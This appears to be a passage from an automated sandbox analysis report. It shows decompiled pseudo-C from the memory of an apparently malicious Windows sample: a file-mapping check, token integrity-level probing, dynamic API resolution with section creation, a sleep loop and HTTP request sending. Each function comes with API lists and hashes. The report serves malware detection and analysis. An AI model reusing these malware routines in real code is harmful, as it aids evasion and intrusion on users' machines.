Instruction Fuzzy Hash: 3A515AB1D01229EFCB10AFA5DC849EEBFB9EF49724F244616F811E2250D7748A40CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 07F78E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E07F78E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L07F7AF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x7f7d2a8; // 0xaaa5a8
				_t5 = _t13 + 0x7f7e87e; // 0x8a28e26
				_t6 = _t13 + 0x7f7e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L07F7AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x7f7d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x07f78e0d
0x07f78e15
0x07f78e19
0x07f78e1f
0x07f78e24
0x07f78e29
0x07f78e2c
0x07f78e2f
0x07f78e34
0x07f78e35
0x07f78e38
0x07f78e3d
0x07f78e44
0x07f78e4e
0x07f78e50
0x07f78e51
0x07f78e54
0x07f78e70
0x07f78e76
0x07f78e7a
0x07f78ec8
0x07f78e7c
0x07f78e89
0x07f78e99
0x07f78ea1
0x07f78eb3
0x07f78eb7
0x00000000
0x00000000
0x07f78ea3
0x07f78ea6
0x07f78eab
0x07f78ead
0x07f78ead
0x07f78e8b
0x07f78e8d
0x07f78eb9
0x07f78eba
0x07f78eba
0x07f78e89
0x07f78ecf

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,07F72FFF,?,?,4D283A53,?,?), ref: 07F78E19
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 07F78E2F
_snwprintf.NTDLL ref: 07F78E54
CreateFileMappingW.KERNELBASE(000000FF,07F7D2AC,00000004,00000000,00001000,?), ref: 07F78E70
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,07F72FFF,?,?,4D283A53), ref: 07F78E82
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 07F78E99
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,07F72FFF,?,?), ref: 07F78EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,07F72FFF,?,?,4D283A53), ref: 07F78EC2

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: aa0c9b5cb81dde27e757b9f26eb47980cbf128c03cd251264986d54cf9ce7ab6
Instruction ID: 5fbf12711f166795797d1c013f11c881354e1a6e45a80388722a810efd01cef7
Opcode Fuzzy Hash: aa0c9b5cb81dde27e757b9f26eb47980cbf128c03cd251264986d54cf9ce7ab6
Instruction Fuzzy Hash: 2321D5F2A40208FBC711ABA4DC0AF8E37ADAB44755F190126FA05E7280D774D505CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07F758DB, Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E07F758DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E07F729C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E07F78B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E07F78B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E07F78B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E07F78B22(_t46);
				}
				return _t24;
			}

0x07f758db
0x07f758db
0x07f758dd
0x07f758df
0x07f758e6
0x07f758ed
0x07f758ed
0x07f758f2
0x07f758f5
0x07f758fc
0x07f75905
0x07f75909
0x07f7590e
0x07f7590e
0x07f75910
0x07f75915
0x07f75919
0x07f7591e
0x07f7591e
0x07f75920
0x07f75925
0x07f75929
0x07f7592e
0x07f7592e
0x07f75930
0x07f7593b
0x07f7593e
0x07f7593e
0x07f75940
0x07f75945
0x07f75948
0x07f75948
0x07f7594a
0x07f75951
0x07f75954
0x07f75959
0x07f7595c
0x07f7595c
0x07f7595f
0x07f75964
0x07f75967
0x07f75967
0x07f7596c
0x07f75970
0x07f75973
0x07f75973
0x07f75978
0x07f7597d
0x00000000
0x07f75980
0x07f75987

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 07F75909
InternetCloseHandle.WININET(?), ref: 07F7590E
InternetSetStatusCallback.WININET(?,00000000), ref: 07F75919
InternetCloseHandle.WININET(?), ref: 07F7591E
InternetSetStatusCallback.WININET(?,00000000), ref: 07F75929
InternetCloseHandle.WININET(?), ref: 07F7592E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,07F793DC,?,?,00000000,00000000,751881D0), ref: 07F7593E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,07F793DC,?,?,00000000,00000000,751881D0), ref: 07F75948

Part of subcall function 07F729C0: WaitForMultipleObjects.KERNEL32(00000002,07F7A923,00000000,07F7A923,?,?,?,07F7A923,0000EA60), ref: 07F729DB

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 9c1727829f1049db847e0363c7dfda2b0d5234f38285fab679656211ecd6d58f
Instruction ID: c743d1d35d511d915c61e6b6019bc17d1b98803aba80c8a1fcc64d761b5c6c1d
Opcode Fuzzy Hash: 9c1727829f1049db847e0363c7dfda2b0d5234f38285fab679656211ecd6d58f
Instruction Fuzzy Hash: 7911DAF6A00649ABC630AEBAEC84C5BF7FDFF452603994D1AE086D3550C725F858CA64

Uniqueness

Uniqueness Score: -1.00%

Function 07F7A2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F7A2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x7f7d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E07F71525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E07F78B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x07f7a2d3
0x07f7a2da
0x07f7a2e1
0x07f7a2f5
0x07f7a300
0x07f7a318
0x07f7a325
0x07f7a328
0x07f7a32d
0x07f7a338
0x07f7a33c
0x07f7a34b
0x07f7a34f
0x07f7a36b
0x07f7a36b
0x07f7a36f
0x07f7a36f
0x07f7a374
0x07f7a378
0x07f7a37e
0x07f7a37f
0x07f7a386
0x07f7a38c

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 07F7A2F8
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 07F7A318
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 07F7A328
CloseHandle.KERNEL32(00000000), ref: 07F7A378

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 07F7A34B
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 07F7A353
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 07F7A363

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 5fa69bfec678be345175ef7766ab33f0db5d88cae17c2fdf336ef01293acb9cd
Instruction ID: 880241e646674ec8fadcfa7416d4d2ff07dc62e4306a18137bb81f4a91c5123d
Opcode Fuzzy Hash: 5fa69bfec678be345175ef7766ab33f0db5d88cae17c2fdf336ef01293acb9cd
Instruction Fuzzy Hash: C7213CB590020DFFEB009FA4DC85EEEBBB9EF48304F1440A6E511A6250DB759A45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00981000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00981000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E009816EE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x983104 + 0x984014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x983104 + 0x984151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E009817CB(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x983104 + 0x984161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x983104 + 0x984174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x983104 + 0x984189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x983104 + 0x98419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00981C90(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0098100e
0x00981012
0x009810d3
0x00981018
0x00981030
0x0098103f
0x00981046
0x00981048
0x0098104d
0x009810cb
0x009810cc
0x0098104f
0x0098105c
0x0098105e
0x00981063
0x00000000
0x00981065
0x00981072
0x00981074
0x00981079
0x00000000
0x0098107b
0x00981088
0x0098108a
0x0098108f
0x00000000
0x00981091
0x0098109e
0x009810a0
0x009810a5
0x00000000
0x009810a7
0x009810ad
0x009810b3
0x009810b8
0x009810bd
0x009810c2
0x00000000
0x009810c4
0x009810c7
0x009810c7
0x009810c2
0x009810a5
0x0098108f
0x00981079
0x00981063
0x0098104d
0x009810e1

APIs

Part of subcall function 009816EE: HeapAlloc.KERNEL32(00000000,?,009819CF,00000030,?,00000000), ref: 009816FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00981DBA,?,?,?,?,?,00000002,?,?), ref: 00981024
GetProcAddress.KERNEL32(00000000,?), ref: 00981046
GetProcAddress.KERNEL32(00000000,?), ref: 0098105C
GetProcAddress.KERNEL32(00000000,?), ref: 00981072
GetProcAddress.KERNEL32(00000000,?), ref: 00981088
GetProcAddress.KERNEL32(00000000,?), ref: 0098109E

Part of subcall function 00981C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00981CED
Part of subcall function 00981C90: memset.NTDLL ref: 00981D0F

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 336417635c40c9590dfff03051c9711ca81aa283ae2c5f49610de813469f6737
Instruction ID: b4dc31716a6e409a68100fa27de6e4182abdf6d2b23cce6549362318970b8464
Opcode Fuzzy Hash: 336417635c40c9590dfff03051c9711ca81aa283ae2c5f49610de813469f6737
Instruction Fuzzy Hash: 172126B060864AAFD710EF69CC88D6ABBECEF647447014469F509C7311EB30EA469F60

Uniqueness

Uniqueness Score: -1.00%

Function 07F72789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E07F72789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x7f7d238 = _t10;
				if(_t10 != 0) {
					 *0x7f7d1a8 = GetTickCount();
					_t12 = E07F79EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L07F7B0CA();
							_t34 = _t14 + _t16;
							_t18 = E07F7122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E07F74D4D(_t26) != 0) {
							 *0x7f7d260 = 1; // executed
						}
						_t12 = E07F72F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x07f72789
0x07f7278f
0x07f72790
0x07f7279c
0x07f727a2
0x07f727a9
0x07f727b9
0x07f727be
0x07f727c5
0x07f727c7
0x07f727cc
0x07f727d2
0x07f727d8
0x07f727e2
0x07f727e6
0x07f727e8
0x07f727ed
0x07f727ee
0x07f727ef
0x07f727f4
0x07f727fa
0x07f72805
0x07f72806
0x07f7280c
0x07f72812
0x07f7281e
0x07f72820
0x07f72820
0x07f7282a
0x07f7282a
0x07f727ab
0x07f727ad
0x07f727ad
0x07f72834

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,07F77F25,?), ref: 07F7279C
GetTickCount.KERNEL32 ref: 07F727B0
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,07F77F25,?), ref: 07F727CC
SwitchToThread.KERNEL32(?,00000001,?,?,?,07F77F25,?), ref: 07F727D2
_aullrem.NTDLL(?,?,00000013,00000000), ref: 07F727EF
Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,07F77F25,?), ref: 07F7280C

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 7bea611a13b03c86fa4392eaaad8e987ffa00fa46c0ad844cfe59bad1e55b486
Instruction ID: 96b66149bb339321fba6fb357355ce475bb9fe222e07023dcd2da71b1ab6e6f3
Opcode Fuzzy Hash: 7bea611a13b03c86fa4392eaaad8e987ffa00fa46c0ad844cfe59bad1e55b486
Instruction Fuzzy Hash: 5F11C2F2A50209ABE3106B74EC1AF5A3AECFB44355F08452AF915CA380EBB4D440C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 07F797F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F797F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E07F78CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E07F7A85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x07f797f7
0x07f79804
0x07f79806
0x07f79869
0x00000000
0x07f79869
0x07f7981e
0x07f79825
0x07f79831
0x07f79836
0x07f7984c
0x07f7985c
0x00000000
0x07f7984e
0x07f7984e
0x07f79855
0x07f79862
0x07f79862
0x07f79862
0x07f79855
0x07f7984c
0x07f79867
0x00000000
0x00000000
0x07f7986d

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,07F7937B,?,?,00000000,00000000), ref: 07F79831
ResetEvent.KERNEL32(?), ref: 07F79836
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 07F79843
GetLastError.KERNEL32 ref: 07F7984E
GetLastError.KERNEL32(?,?,00000102,07F7937B,?,?,00000000,00000000), ref: 07F79869

Part of subcall function 07F78CFA: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,07F79816,?,?,?,?,00000102,07F7937B,?,?,00000000), ref: 07F78D06
Part of subcall function 07F78CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,07F79816,?,?,?,?,00000102,07F7937B,?), ref: 07F78D64
Part of subcall function 07F78CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 07F78D74

SetEvent.KERNEL32(?), ref: 07F7985C

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: c4d3fddadad52ec9f17ceebdf8e49a84d504d7810b2cdeb60752d21675ecbb40
Instruction ID: d5388b7c3aaaa4ccbf5ba2ec93d28c9854b5c68ad76af25983db6e1ca6262a29
Opcode Fuzzy Hash: c4d3fddadad52ec9f17ceebdf8e49a84d504d7810b2cdeb60752d21675ecbb40
Instruction Fuzzy Hash: 7C01D6F1500301ABDB30AB32EC44F1BB6ADFF44369F584626F461D51E0D761F804DA61

Uniqueness

Uniqueness Score: -1.00%

Function 07F72F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E07F72F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E07F759A4();
				if(_t21 != 0) {
					_t59 =  *0x7f7d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x7f7d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x7f7d160(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E07F72B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x7f7d2a8; // 0xaaa5a8
					if( *0x7f7d25c > 5) {
						_t8 = _t26 + 0x7f7e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x7f7e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E07F79154(_t27, _t27);
					_t31 = E07F78E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x7f7d270 =  *0x7f7d270 ^ 0x81bbe65d;
						_t32 = E07F71525(0x60);
						 *0x7f7d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x7f7d32c; // 0x8a295b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x7f7d32c; // 0x8a295b0
							 *_t51 = 0x7f7e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x7f7d238, 0, 0x43);
							 *0x7f7d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x7f7d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x7f7d2a8; // 0xaaa5a8
								_t13 = _t58 + 0x7f7e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x7f7c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E07F77A2E( ~_v8 &  *0x7f7d270, 0x7f7d00c); // executed
								_t42 = E07F77FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E07F750E8();
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E07F77C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E07F746B2(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x7f7d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E07F78B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x07f72f70
0x07f72f7b
0x07f72f7e
0x07f72f81
0x07f72f84
0x07f72f8b
0x07f72f8d
0x07f72f99
0x07f72f9b
0x07f72f9b
0x07f72fa4
0x07f72faa
0x07f72faf
0x07f72fc9
0x07f72fd5
0x07f72fd7
0x07f72fdc
0x07f72fe6
0x07f72fe6
0x07f72fde
0x07f72fde
0x07f72fde
0x07f72fde
0x07f72fed
0x07f72ffa
0x07f73001
0x07f73006
0x07f73006
0x07f7300e
0x07f73011
0x07f73037
0x07f73043
0x07f73048
0x07f7304d
0x07f7304f
0x07f7307b
0x07f7307d
0x07f73051
0x07f73055
0x07f7305a
0x07f7305f
0x07f73066
0x07f7306c
0x07f73071
0x07f73077
0x07f7307e
0x07f73080
0x07f73082
0x07f73091
0x07f73097
0x07f7309c
0x07f7309e
0x07f730ce
0x07f730d0
0x07f730a0
0x07f730a0
0x07f730a6
0x07f730b3
0x07f730b9
0x07f730b9
0x07f730c1
0x07f730ca
0x07f730d1
0x07f730d3
0x07f730d5
0x07f730dc
0x07f730e9
0x07f730ee
0x07f730f3
0x07f730f5
0x07f730f7
0x00000000
0x00000000
0x07f730f9
0x07f730fe
0x07f73100
0x07f73107
0x07f7310b
0x07f7310e
0x07f73123
0x07f73127
0x07f7312c
0x00000000
0x07f7312c
0x07f73110
0x07f73112
0x00000000
0x00000000
0x07f73118
0x07f7311d
0x07f7311f
0x07f73121
0x00000000
0x00000000
0x00000000
0x07f73121
0x07f73104
0x07f73104
0x07f730d5
0x07f73013
0x07f73013
0x07f73018
0x07f7312e
0x07f73132
0x07f7313a
0x07f7313a
0x00000000
0x07f73132
0x07f7301e
0x07f73021
0x07f7302b
0x07f73032
0x00000000
0x07f73142
0x07f73142
0x07f73146
0x07f7314a
0x07f7314a

APIs

Part of subcall function 07F759A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,07F72F89,00000000,00000000), ref: 07F759B3

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 07F73006

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

memset.NTDLL ref: 07F73055
RtlInitializeCriticalSection.NTDLL(08A29570), ref: 07F73066

Part of subcall function 07F746B2: memset.NTDLL ref: 07F746C7
Part of subcall function 07F746B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 07F74709
Part of subcall function 07F746B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 07F74714

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 07F73091
wsprintfA.USER32 ref: 07F730C1

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
